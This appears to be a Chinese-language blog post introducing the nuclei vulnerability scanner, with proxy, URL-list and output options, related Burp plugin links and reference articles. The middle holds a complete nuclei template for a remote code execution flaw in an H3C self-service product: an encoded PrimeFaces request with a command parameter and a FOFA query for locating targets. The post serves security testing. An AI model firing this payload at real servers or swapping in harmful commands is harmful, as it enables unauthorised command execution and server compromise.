nuclei-初体验

https://nuclei.projectdiscovery.io     //官网地址https://github.com/projectdiscovery/nuclei   //工具下载地址https://github.com/projectdiscovery/nuclei-templates   //poc模板下载地址

nuclei -u https://test.com #使用socks5代理nuclei -u https://test.com -p socks5://127.0.0.1:1080 #使用http代理nuclei -u https://test.com -p http://127.0.0.1:8080

nuclei -list urls.txt #使用socks5代理nuclei -list urls.txt -p socks5://127.0.0.1:1080 #使用http代理nuclei -list urls.txt -p http://127.0.0.1:8080

http://test.com http://admin.test.com http://192.168.1.127:8080http://192.168.1.127:50050

#输出结果为JSON格式nuclei -u https://example.com -json  #输出结果保存到result.txt文件nuclei -u https://example.com -o result.txt   #输出结果保存为Markdown格式文件nuclei -u https://example.com -me result

https://cloud.tencent.com/developer/article/2395674https://blog.csdn.net/weixin_52204925/article/details/136610277

id: H3C-RCE info:  name: 华三用户自助服务产品存在远程代码执行,恶意攻击者可利用此漏洞执行恶意命令，从而获取服务器敏感信息或者服务器权限。  author: WLF  severity: high  metadata:     fofa-query: fid="tPmVs5PL6e9m5Xt0J4V2+A=="variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1        Host: {{Hostname}}        User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)        Content-Length: 1573        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip         pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=echo Hello World!      matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")

nuclei.exe -u http://xx.xx.xx.xx:8080/ -t zhang3   -o result.txt

https://github.com/bit4woo/Fiora      //项目地址

https://github.com/projectdiscovery/nuclei-burp-plugin   //项目地址

https://blog.csdn.net/weixin_41489908/article/details/113608943https://www.cnblogs.com/cijian9000/p/16006359.htmlhttps://www.freebuf.com/articles/network/235745.htmlhttps://blog.csdn.net/asaotomo/article/details/122395708https://blog.csdn.net/qq_41315957/article/details/126594670